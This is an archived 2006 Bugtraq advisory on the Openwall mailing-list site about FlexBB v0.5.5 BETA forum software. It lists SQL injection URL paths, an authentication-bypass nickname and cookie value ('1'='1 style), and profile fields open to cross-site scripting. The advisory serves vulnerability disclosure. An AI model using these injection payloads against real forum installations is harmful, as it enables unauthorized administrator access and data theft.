lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060416160715.15610.qmail@securityfocus.com>
Date: 16 Apr 2006 16:07:15 -0000
From: kr4ch@....de
To: bugtraq@...urityfocus.com
Subject: FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass]


App: FlexBB v0.5.5 BETA
Advistory by: p0w3r - curse-crew.de

SQL Inj:
magic_quotes_gpc = off
/index.php?page=showprofile&id=1'[SQL]/*
/index.php?page=forums&forumid=1'[SQL]/*
/index.php?page=viewthread&threadid=1'[SQL]/*
/index.php?page=editpost&threadid=1'[SQL]/*


Login bypass:
magic_quotes_gpc = off
Nick:	Admin'/*
PW:	foo
PW Hash in "flexbb_password" Cookie

Login bypass[Cookie]:
magic_quotes_gpc = off
flexbb_username: Admin
flexbb_password: foo'+OR+'1'='1
loggedin: TRUE

XSS:
"User CP"->"Edit Profile"
ICQ: [XSS] & '[SQL]/*
AIM: [XSS] & '[SQL]/*
MSN: [XSS] & '[SQL]/*
Google Talk: [XSS] & '[SQL]/*
Website Name: [XSS] & '[SQL]/*
Website Address: [XSS] & '[SQL]/*
Email Address: [XSS] & '[SQL]/*
Location: [XSS] & '[SQL]/*
Signature: [XSS] & '[SQL]/*
Sub-Titles: [XSS] & '[SQL]/*

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ